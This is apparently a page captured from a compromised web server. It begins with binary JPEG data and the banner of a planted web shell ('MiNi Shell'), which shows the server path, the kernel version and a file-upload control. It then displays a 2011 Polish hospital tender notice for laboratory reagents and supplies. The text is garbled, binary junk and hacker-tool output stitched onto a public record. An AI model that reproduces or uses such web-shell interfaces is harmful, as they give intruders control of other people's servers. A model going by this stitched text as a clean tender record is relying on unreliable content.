JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110517/116482-N-2011.html

<p class="kh_header"><b>Suwałki: Dostawa testów, odczynników i podłoży oraz drobnego sprzętu do medycznego laboratorium diagnostycznego i mikrobiologicznego</b><br>
<b>Numer ogłoszenia: 116482 - 2011; data zamieszczenia: 17.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Wojewódzki , ul. Szpitalna 60, 16-400 Suwałki, woj. podlaskie, tel. 087 5629582, 5629462, 5629595, faks 087 5629594.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.suwalki.pl/przetargi</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa testów, odczynników i podłoży oraz drobnego sprzętu do medycznego laboratorium diagnostycznego i mikrobiologicznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje:
Pakiet I: Sprzęt jednorazowy i szkiełka mikroskopowe do laboratorium medycznego
Pakiet II: 
ZADANIE I - Podłoża do diagnostyki mikrobiologicznej 
		GRUPA 1 Podłoża podstawowe
		GRUPA 2 Podłoża do badania nosicielstwa S. Agalactiae
		GRUPA 3  Podłoża z chromogenami
ZADANIE II -  Krążki do oznaczania wrażliwości na antybiotyki; 
ZADANIE III - Testy lateksowe i inne do identyfikacji i hodowli bakterii; 
ZADANIE IV - Testy i odczynniki do diagnostyki mikrobiologicznej - różne 
Pakiet III: 
ZADANIE I - Immunochemiczne testy diagnostyczne  ANA/ANCA wraz z dzierżawą sprzętu
ZADANIE II - Immunochemiczne testy diagnostyczne ELISA z dzierżawą sprzętu.
ZADANIE III - Immunochemiczne testy diagnostyczne EUROLINE Z dzierżawą sprzętu
Pakiet IV: Testy diagnostyczne kasetkowe i paskowe
Pakiet V: Złoże jonowymienne do stacji uzdatniania wody
Pakiet VI: Odczynniki chemiczne
Pakiet VII: Odczynniki Giemsy i May-Grunwalda
Pakiet VIII: Zestawy do badania kamieni moczowych i aktywności fosfatazy zasadowej granulocytów
Pakiet IX: Testy diagnostyczne do dzierżawionych analizatorów SYNCHRON CX-5 oraz ACCESS
Pakiet X: Odczynniki, kalibratory, materiały kontrolne i zużywalne do badań laboratoryjnych z zakresu hemostazy wraz z dzierżawą analizatora w asortymencie i w szacunkowej ilości, określonych w załączniku nr 3  do SIWZ na okres 12 miesięcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 25.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W przedmiotowym postępowaniu nie wymaga się wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>do potwierdzenia oswiadczenia w załączniku nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>do potwierdzenia oswiadczenia w załączniku nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>do potwierdzenia oswiadczenia w załączniku nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>do potwierdzenia oswiadczenia w załączniku nr 4 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.oświadczenia, że oferowany asortyment posiada dokumenty wymagane przez polskie prawo, na   podstawie których może być wprowadzony do obrotu i stosowania w placówkach ochrony zdrowia w RP  zgodnie z Ustawą o wyrobach medycznych (Dz. U. 2010 Nr 107 Poz. 679) i posiadają stosowne certyfikaty - treść oświadczenia znajduje się w druku oferty, który stanowi załącznik nr 1 do SIWZ
1.3.2.	wypełnionego arkusza asortymentowo - cenowego (wzór stanowi załącznik nr  3 do SIWZ)
1.3.3.	katalogu (prospektu, ulotka informacyjna), w języku polskim, zawierającego oznaczony oferowany asortyment (pozycja z kodem) i opis  zgodny z wymaganiami w SIWZ - w przypadku firm dysponujących katalogiem (prospektem) zawierającym różny asortyment.  W przypadku firm, które dysponują odrębnymi katalogami (prospektami) dla oferowanego asortymentu, zobowiązane są one do dołączenia do oferty tylko tych katalogów (prospektów), które dotyczą oferowanego asortymentu</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.suwalki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień i Inwestycji, ul. szpitalna 60, 16-400 Suwałki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2011 godzina 10:30, miejsce: kancelaria Szpitala, ul. Szpitalna 60, 16-400 Suwałki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET I - SPRZĘT JEDNORAZOWY I SZKIEŁKA MIKROSKOPOWE DO LABORATORIUM MEDYCZNEGO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Końcówki żółte o poj. do 200 uL	szt	60 000
2.Końcówki niebieskie o poj. do 1000 uL	szt	36 000
3.Probówki plastikowe, okrągłodenne 16 x 100 mm PP	szt	25 000
4.Probówki plastikowe, okrągłodenne 16 x 100 mm PS	szt	5 000
5.Probówki plastikowe, okrągłodenne 12 x 75 mm PP	szt	15 000
6.Korki do probówek 12 mm, żółte	szt	5 000
7.Probówki typu Eppendorf o poj. 1,5 mL, bezbarwne	szt	10 000
8.Naczynka o poj.125 mL na mocz z zakrętką	szt	35 000
8.Pojemnik do kału o poj. 30 mL z zakrętką i łopatką	szt	7 000
10.Naczynka do Technicona o poj. 0,5 mL	szt	8 000
11.Naczynka do Technicona o poj. 2,0 mL	szt	5 000
12.Kapilary do gazometrii z heparyną Li o poj. 130 uL	szt	12 000
13.Zatyczki do kapilar gazometrii o poj. powyżej 100 uL	szt	24 000
14.Mieszadełka do kapilar o poj. powyżej 100 uL	szt	12 000
15.Nożyki stalowe do nakłuwania palca - zwykłe ( !!! )	szt	12 000
16.Nakłuwacze automatyczne jałowe, gł.nakł. 1,8 mm	szt	5 000
17.Bagietki koagulologiczne z harpunem	szt	2 000
18.Zestawy transportowe do WR	szt	1 000
19.Strzykawka o poj. 2,0 ml, sterylna, z heparyną litową	szt	3 600
20.Zestaw do OB na 1 mL ( z przebijanym korkiem, wysokość probówki ok.75 mm )szt 2 000
21.Stazy zaciskowe, wielorazowe, z zamknięciem	szt	20
22.Pipety Pasteura o poj. 1,5 mL, plastikowe, jednorazowe	szt	1000
23.Szkiełka podstawowe z ciętymi krawędziami	szt	15000
24.Szkiełka nakrywkowe 20x20x0,15 mm	szt	30000
25.Szkiełka nakrywkowe 24x32x0,15 mm	szt	500
zgodnie z załącznikiem nr 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet II ZADANIE I - PODŁOŻA
GRUPA 1 PODŁOŻA PODSTAWOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Płytki O 90 mm
1Columbia Agar z 5%krwi baraniej, op. max.100 szt.	szt	8000 
2Agar czekoladowy wzbogacony czynnikami X (hemina) i V (NAD) dla Haemophilus i Neisseria; op. max.20 szt.	szt	2500 
3MacConcey Agar z fiol.kryst. dla Enterobacteriaceae /fiolet kryst.0,001g/L; sole żółciowe 1,5 g/L/; op. max.20 szt.	szt	2500 
4Chapman Agar ;op. max.20 szt.	szt	2000 
5Agar Schaedlera +5%krwi baraniej;; op. max.20 szt.	szt	300 
6Agar Schaedlera +5%krwi baraniej+kanamycyna+wankomycyna; op. max.20 szt. szt	300 
7.Płytki odciskowe do pobierania prób ze środowiska; op. max.20 szt.szt 100 
Podłoża do hodowli prątków gruźlicy
8.Podłoże Lowensteina-Jensena, skos w probówce, op. max. 100 szt.szt 3000 
9.Podłoże Stonebrinka, skos w probówce, op. max. 100 szt. 	szt 1500 
Podłoża do antybiogramów
10.Mueller Hinton II Agar płytki O 90 mm; op. max 100 szt.	szt	3000 
11.Mueller Hinton Agar (MH-F) z 5% krwią końską i 20 mg/L NAD płytki O 90 mm; op. max.20 szt.	szt	600 
12.Mueller Hinton Agar (MH-F) z 5% krwią baranią; płytki O 90 mm; op. max.20 szt.	szt	300
13.Podłoże do oznaczania wrażliwości grzybów drożdżopodobnych na antybiotyki; płytki O 90 mm; op. max 20 szt.	szt	400 
14.Burcella agar - Podłoże do oznaczania wrażliwości beztlenowców, płytki O 90 mm; op. max.10 szt.	szt	100 
15.Brucella bulion, op. max.200 ml do zawiesiny szczpu przy wykonywaniu antybiogramu dla beztlenowców	butelka	4
Podłoża transportowo-wzrostowe
15.Podłoże transportowo-wzrostowe do posiewu moczu [MacConcey/Cled]; op. max.100 szt.	szt	1600
Podłoża w butelkach
Columbia Agar, op.500 ml	butelka	12 
M-Hinton II Agar, op. 200 m	butelka	60 
M-Hinton II Agar, op. 500 ml	butelka	12 
BHI Agar., op. 500 ml	butelka	12 
Podłoża w probówkach
BHI Bulion; op. max.100 szt.szt	4000
Bulion tryptozowo-sojowy; op.max. 50 szt.szt	400
Schaedler+vit.K bulion; op. max.10 szt.szt	100 
Podłoże do hodowli Trichomonas vaginalis płynne, fiolka 3-5 ml; op. max.10 sztszt 40 
Agar półpłynny na ruch, op. max 20 szt. szt	100
zgodnie z załącznikiem nr 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet II ZADANIE I - PODŁOŻA
GRUPA 2 PODŁOŻA DO BADANIA NOSICIELSTWA S. AGALACTIAE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1Podłoże Granada - do badań przesiewowych w kierunku S.agalactiae
płytki O 90 mm, op. max.20 szt. szt	1500				
2Bulion Granada - wybiórczo-namnażający do badań przesiewowych w kierunku S.agalactiae op. max.40 szt. szt	1500
zgodnie z załącznikiem nr 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet II ZADANIE I - PODŁOŻA
GRUPA 3. Podłoża z chromogenami.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1Płytki różnicujące chromogenenne dla Candida spp.; płytki O 90 mm, op. max.100 szt.	szt	1500 						
2Płytki różnicujące chromogenenne dla Enterobacteriaceae i Enterococcus ; płytki O 90 mm, op. max.100 szt.	szt	2000 				
3Podłoże chromogenenne z cefoksytyną do wykrywania MRSA; płytki O 90 mm, op. max.20 szt.	szt	240 					
4Wybiórcze podłoże chromogenne do badań przesiewowych w kierunku Enterobacteriaceae wytwarzających ß-laktamazy o rozszerzonym spektrum substratowym (ESBL) płytki O 90 mm, op. max.20 szt.	szt	240 	
5Wybiórcze podłoże chromogenne do wykrywania szczepów Enterococcus wykazujących nabytą oporność na wankomycynę (VRE); płytki O 90 mm, op. max.20 szt.	szt 120
zgodnie z załącznikiem nr 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet II ZADANIE II - KRĄŻKI DO OZNACZANIA WRAŻLIWOŚCI NA ANTYBIOTYKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1Krążki do oznaczania wrażliwości bakterii na antybiotyki, fiolka 50 szt.; ASORTYMENT WG WYKAZU fiolka	500
2Krążki do oznaczania wrażliwości grzybów, fiolka 50 szt. ASORTYMENT WG WYKAZU fiolka	80
zgodnie z załącznikiem nr 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet II ZADANIE III - TESTY LATEKSOWE I INNE DO IDENTYFIKACJI HODOWLI BAKTERII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1Krążki z optochiną do identyfikacji S.pneumoniae; op. max.60 szt. krążki	1000
2.Krążki z bacytracyną 0,04 j.m. do identyfikacji S.pyogenes; op. max.50 szt.
krążki	250
3.Krążki z cefinazą do oznaczania produkcji ß-laktamaz; op. max. 50 ozn. krążki1200
4.Test lateksowy do identyfikacji paciorkowców ß-hemolizujących grupy A,B,C,D,F,G. Zestaw z enzymem do ekstrakcji.;op. max. po 50 ozn. ozn. (dla każdej grupy)	100
5.Test lateksowy do identyfikacji paciorkowców ß-hemolizujących grupy A. Zestaw z enzymem do ekstrakcji.; op. max.50 ozn. ozn.	50
6.Test lateksowy do identyfikacji paciorkowców ß-hemolizujących grupy B. Zestaw z enzymem do ekstrakcji.; op. max.50 ozn. - ozn.	200
7.Test lateksowy do identyfikacji Saureus; op. max.250 ozn. -ozn.	1500
8.est aglutynacyjny do mononukleozy, op. max.50 ozn.-ozn.	150
9Test do wykrywania antygenów bakteryjnych w PMR (zestaw); op. max. po 25 ozn.-ozn.	50
10.Saszetki do wytwarzania atmosfery wzbogaconej w CO2 do pojemników 2,5 L, bezwodne -szt	450
11.Saszetki do wytwarzania atmosfery beztlenowej do pojemników 2,5 L, bezwodne
szt 250
12.Saszetki do wytwarzania atmosfery beztlenowej do torebek, bezwodne +torebki +klips zamykający -szt 450
zgodnie z załącznikiem nr 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet II ZADANIE IV
 TESTY I ODCZYNNIKI DO DIAGNOSTYKI MIKROBIOLOGICZNEJ - RÓŻNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1Krew barania, odwłókniona, jałowa; op. max. 100 ml-ml	1200
zgodnie z załącznikime nr 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet II ZADANIE IV
 TESTY I ODCZYNNIKI DO DIAGNOSTYKI MIKROBIOLOGICZNEJ - RÓŻNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.Zestaw do VDRL-ozn.	1000
zgodnie z załącznikime nr 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet II ZADANIE IV
 TESTY I ODCZYNNIKI DO DIAGNOSTYKI MIKROBIOLOGICZNEJ - RÓŻNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.Probówka wirownicza FALKON, z podziałka, 50 ml-szt	2000
zgodnie z załacznikime nr 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet II ZADANIE IV
 TESTY I ODCZYNNIKI DO DIAGNOSTYKI MIKROBIOLOGICZNEJ - RÓŻNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 4Test immunochromatograficzny do wykrywania toksyny A i B C.difficile w kale, kasetkowy, testy pakowane pojedynczo, op. max. 20 szt.-szt	100
zgodnie z załącznikime nr 3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
